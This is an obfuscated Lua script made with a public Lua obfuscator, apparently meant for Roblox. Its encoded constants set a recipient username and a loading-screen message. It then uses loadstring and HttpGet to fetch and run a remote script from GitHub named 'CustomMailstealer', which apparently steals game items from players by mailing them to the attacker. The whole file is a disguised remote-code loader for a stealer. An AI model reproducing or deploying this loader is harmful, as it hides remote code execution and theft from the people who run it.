--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=(1637 -(1523 + 114)) -(0 + 0) ;local v83;while true do if (v82==(0 -0)) then v83=(v31/((3 -1)^(v32-1)))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -((1221 -364) + 74)))) + (569 -(367 + 201)))) ;return v83-(v83%(928 -(214 + 713))) ;end end else local v84=((1066 -(68 + 997)) + 1)^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and 1) or (877 -(282 + 595)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=1270 -(226 + 1044) ;local v35;local v36;local v37;local v38;while true do if (v34==(4 -3)) then return (v38 * (16777333 -(32 + (157 -72)))) + (v37 * 65536) + (v36 * (251 + (8 -3))) + v35 ;end if (v34==(0 + 0)) then v35,v36,v37,v38=v1(v16,v19,v19 + (960 -(892 + 65)) );v19=v19 + (9 -5) ;v34=1;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=1793 -(1563 + 230) ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v39~=(286 -(134 + 151))) then else v42=nil;v43=nil;v39=1667 -(970 + 695) ;end if (v39~=(0 -0)) then else v40=0;v41=nil;v39=1991 -(582 + 1408) ;end if (4==v39) then while true do if (v40==(3 -2)) then local v99=0;while true do if ((0 -0)==v99) then v43=nil;v44=nil;v99=1;end if (v99~=1) then else v40=7 -5 ;break;end end end if (v40==0) then local v100=1824 -(1195 + 629) ;while true do if (v100~=(1 -0)) then else v40=242 -(187 + 54) ;break;end if (v100~=0) then else v41=0;v42=nil;v100=781 -(162 + 618) ;end end end if (v40==2) then v45=nil;v46=nil;v40=3 + 0 ;end if (v40==(2 + 1)) then v47=nil;while true do local v101=0 -0 ;local v102;while true do if ((0 -0)~=v101) then else v102=0;while true do if (v102==0) then if (v41==2) then local v118=0;local v119;while true do if (v118~=0) then else v119=0;while true do if (v119==(1 + 0)) then for v165=1637 -(1373 + 263) ,v24() do local v166=0;local v167;local v168;local v169;while true do if (0==v166) then v167=0;v168=nil;v166=1001 -(451 + 549) ;end if (1==v166) then v169=nil;while true do if (v167==1) then while true do if (v168==(0 + 0)) then v169=v22();if (v21(v169,1,1 -0 )==(0 -0)) then local v181=1384 -(746 + 638) ;local v182;local v183;local v184;local v185;while true do if ((1 + 1)~=v181) then else while true do if (v182==(1 -0)) then local v189=341 -(218 + 123) ;local v190;while true do if (v189~=(1581 -(1535 + 46))) then else v190=0;while true do if ((0 + 0)==v190) then local v200=0 + 0 ;local v201;while true do if (v200==(560 -(306 + 254))) then v201=0;while true do if (v201~=1) then else v190=1;break;end if (v201==(0 + 0)) then local v205=0;while true do if (1~=v205) then else v201=1 -0 ;break;end if (v205==0) then v185={v23(),v23(),nil,nil};if (v183==(0 + 0)) then local v207=0 -0 ;local v208;while true do if (0==v207) then v208=603 -(268 + 335) ;while true do if (v208==0) then v185[293 -(60 + 230) ]=v23();v185[576 -(426 + 146) ]=v23();break;end end break;end end elseif (v183==(1 + 0)) then v185[1459 -(282 + 1174) ]=v24();elseif (v183==2) then v185[814 -(569 + 242) ]=v24() -((5 -3)^16) ;elseif (v183==3) then local v217=0 + 0 ;local v218;while true do if (v217==0) then v218=0;while true do if (0==v218) then v185[3]=v24() -((1026 -(706 + 318))^16) ;v185[4]=v23();break;end end break;end end end v205=1252 -(721 + 530) ;end end end end break;end end end if ((1272 -(945 + 326))~=v190) then else v182=2;break;end end break;end end end if (v182==2) then local v191=0;local v192;while true do if (v191==(0 -0)) then v192=0;while true do if (v192~=1) then else v182=3 + 0 ;break;end if (v192==(700 -(271 + 429))) then local v202=0 + 0 ;local v203;while true do if (v202==0) then v203=0;while true do if (v203==1) then v192=1501 -(1408 + 92) ;break;end if (0~=v203) then else local v206=1086 -(461 + 625) ;while true do if (0~=v206) then else if (v21(v184,1,1)==(1289 -(993 + 295))) then v185[1 + 1 ]=v47[v185[1173 -(418 + 753) ]];end if (v21(v184,2,2)==(1 + 0)) then v185[1 + 2 ]=v47[v185[1 + 2 ]];end v206=1 + 0 ;end if (v206~=(530 -(406 + 123))) then else v203=1;break;end end end end break;end end end end break;end end end if (v182~=3) then else if (v21(v184,3,1772 -(1749 + 20) )==1) then v185[4]=v47[v185[1 + 3 ]];end v42[v165]=v185;break;end if (v182==0) then local v194=1322 -(1249 + 73) ;local v195;local v196;while true do if (v194==1) then while true do if (v195==0) then v196=0 + 0 ;while true do if (v196~=1) then else v182=1;break;end if (v196~=0) then else local v204=1145 -(466 + 679) ;while true do if (v204~=(2 -1)) then else v196=1;break;end if (v204==(0 -0)) then v183=v21(v169,1902 -(106 + 1794) ,3);v184=v21(v169,2 + 2 ,6);v204=1 + 0 ;end end end end break;end end break;end if ((0 -0)==v194) then v195=0;v196=nil;v194=1;end end end end break;end if (v181==(2 -1)) then v184=nil;v185=nil;v181=2;end if (v181==0) then local v187=114 -(4 + 110) ;local v188;while true do if (v187~=0) then else v188=0;while true do if (v188==(584 -(57 + 527))) then local v199=1427 -(41 + 1386) ;while true do if (v199~=(103 -(17 + 86))) then else v182=0 + 0 ;v183=nil;v199=1;end if (v199==1) then v188=1 -0 ;break;end end end if (v188~=(2 -1)) then else v181=167 -(122 + 44) ;break;end end break;end end end end end break;end end break;end if (v167==0) then v168=0 -0 ;v169=nil;v167=3 -2 ;end end break;end end end v41=3;break;end if (v119==(0 + 0)) then for v170=1 + 0 ,v46 do local v171=0 -0 ;local v172;local v173;local v174;while true do if (v171~=1) then else v174=nil;while true do if (v172~=1) then else if (v173==(66 -(30 + 35))) then v174=v22()~=(0 + 0) ;elseif (v173==(1259 -(1043 + 214))) then v174=v25();elseif (v173==3) then v174=v26();end v47[v170]=v174;break;end if (0==v172) then local v179=0 -0 ;local v180;while true do if (v179==0) then v180=0;while true do if (v180==0) then local v186=1212 -(323 + 889) ;while true do if (0~=v186) then else v173=v22();v174=nil;v186=1;end if (v186~=(2 -1)) then else v180=581 -(361 + 219) ;break;end end end if (v180==1) then v172=321 -(53 + 267) ;break;end end break;end end end end break;end if (v171==(0 + 0)) then local v177=0;while true do if (v177==0) then v172=0;v173=nil;v177=414 -(15 + 398) ;end if (v177~=1) then else v171=1;break;end end end end end v45[985 -(18 + 964) ]=v22();v119=3 -2 ;end end break;end end end if (v41==0) then local v120=0 + 0 ;while true do if (0==v120) then v42={};v43={};v120=1;end if (v120==1) then v44={};v41=1 + 0 ;break;end end end v102=1;end if (v102==1) then if (v41==(851 -(20 + 830))) then local v121=0 + 0 ;while true do if (v121==1) then v47={};v41=128 -(116 + 10) ;break;end if (v121==(0 + 0)) then v45={v42,v43,nil,v44};v46=v24();v121=1;end end end if (v41==3) then local v122=0;while true do if ((0 + 0)~=v122) then else for v158=1,v24() do v43[v158-1 ]=v29();end return v45;end end end break;end end break;end end end break;end end break;end if (v39~=(2 + 0)) then else v44=nil;v45=nil;v39=2 + 1 ;end if (v39~=3) then else v46=nil;v47=nil;v39=10 -6 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=v24();local v49=v24();local v50=2 -1 ;local v51=(v21(v49,1552 -(1126 + 425) ,425 -(118 + 287) ) * ((7 -5)^(1153 -(118 + 1003)))) + v48 ;local v52=v21(v49,21,(27 + 63) -59 );local v53=((v21(v49,409 -(142 + 235) )==(4 -3)) and  -(4 -(756 -(239 + 514)))) or (1 + 0) ;if (v52==(0 + 0)) then if (v51==0) then return v53 * (977 -(553 + 424)) ;else local v90=0 -0 ;while true do if ((0 + 0)==v90) then v52=(1330 -(797 + 532)) + 0 ;v50=0;break;end end end elseif (v52==(1192 + 855)) then return ((v51==(0 + 0 + 0)) and (v53 * ((1 + 0)/(0 -0)))) or (v53 * NaN) ;end return v8(v53,v52-1023 ) * (v50 + (v51/((5 -3)^(116 -64)))) ;end v26=nil;function v26(v54)local v55=0 + 0 ;local v56;local v57;while true do if (v55==(0 + 0)) then v56=nil;if  not v54 then v54=v24();if (v54==(0 -(238 -(64 + 174)))) then return "";end end v55=1203 -(373 + 829) ;end if (v55==2) then v57={};for v91=732 -(476 + 255) , #v56 do v57[v91]=v2(v1(v3(v56,v91,v91)));end v55=(1677 -544) -(369 + 761) ;end if (v55==(2 + 1)) then return v6(v57);end if (v55==((337 -(144 + 192)) -0)) then v56=v3(v16,v19,(v19 + v54) -1 );v19=v19 + v54 ;v55=3 -1 ;end end end v18=5;end if (v18==2) then function v22()local v58=v1(v16,v19,v19);v19=v19 + 1 ;return v58;end v23=nil;function v23()local v59,v60=v1(v16,v19,v19 + (218 -(42 + 174)) );v19=v19 + 2 + 0 ;return (v60 * 256) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then local v85=0;while true do if (v85==0) then v20=v0(v3(v61,1,1));return "";end end else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v61,16));if v20 then local v103=v5(v87,v20);v20=nil;return v103;else return v87;end break;end end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v89=0;while true do if (v89==0) then v80=v68[v72];v81=v80[1];v89=1;end if (v89==1) then if (v81<=9) then if (v81<=4) then if (v81<=1) then if (v81==0) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end else do return;end end elseif (v81<=2) then local v104=0;local v105;local v106;while true do if (v104==0) then v105=v80[2];v106=v78[v80[3]];v104=1;end if (v104==1) then v78[v105 + 1 ]=v106;v78[v105]=v106[v80[4]];break;end end elseif (v81>3) then local v126=v80[2];local v127,v128=v71(v78[v126](v13(v78,v126 + 1 ,v80[3])));v73=(v128 + v126) -1 ;local v129=0;for v152=v126,v73 do local v153=0;while true do if (v153==0) then v129=v129 + 1 ;v78[v152]=v127[v129];break;end end end else local v130=v80[2];v78[v130]=v78[v130](v13(v78,v130 + 1 ,v73));end elseif (v81<=6) then if (v81==5) then v64[v80[3]]=v78[v80[2]];else v78[v80[2]]=v80[3];end elseif (v81<=7) then v64[v80[3]]=v78[v80[2]];elseif (v81==8) then local v132=v80[2];local v133=v78[v80[3]];v78[v132 + 1 ]=v133;v78[v132]=v133[v80[4]];elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=14) then if (v81<=11) then if (v81==10) then v78[v80[2]]();elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81<=12) then v78[v80[2]]=v80[3];elseif (v81==13) then do return;end else v72=v80[3];end elseif (v81<=16) then if (v81==15) then local v115=0;local v116;while true do if (v115==0) then v116=v80[2];v78[v116]=v78[v116](v13(v78,v116 + 1 ,v73));break;end end elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=17) then v72=v80[3];elseif (v81==18) then local v142=0;local v143;local v144;local v145;local v146;while true do if (v142==2) then for v162=v143,v73 do local v163=0;while true do if (v163==0) then v146=v146 + 1 ;v78[v162]=v144[v146];break;end end end break;end if (v142==0) then v143=v80[2];v144,v145=v71(v78[v143](v13(v78,v143 + 1 ,v80[3])));v142=1;end if (v142==1) then v73=(v145 + v143) -1 ;v146=0;v142=2;end end else v78[v80[2]]();end v72=v72 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F030D3O00475F4D61696C6D652O7361676503043O00676F6174030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269437573746F6D2F6D61696E2F437573746F6D4D61696C737465616C657203083O00557365726E616D6503063O0048346B342O72030F3O00475F4C6F6164696E675363722O656E03103O006C6F61696E67207363726970743O2E00163O00120C3O00013O0026093O000D0001000200040E3O000D000100120C000100043O001205000100033O00122O000100053O00122O000200063O00200200020002000700120C000400084O0004000200044O000F00013O00022O001300010001000100040E3O001500010026093O00010001000100040E3O0001000100120C0001000A3O001205000100093O00120C0001000C3O0012050001000B3O00120C3O00023O00040E3O000100012O00013O00017O00",v9(),...);
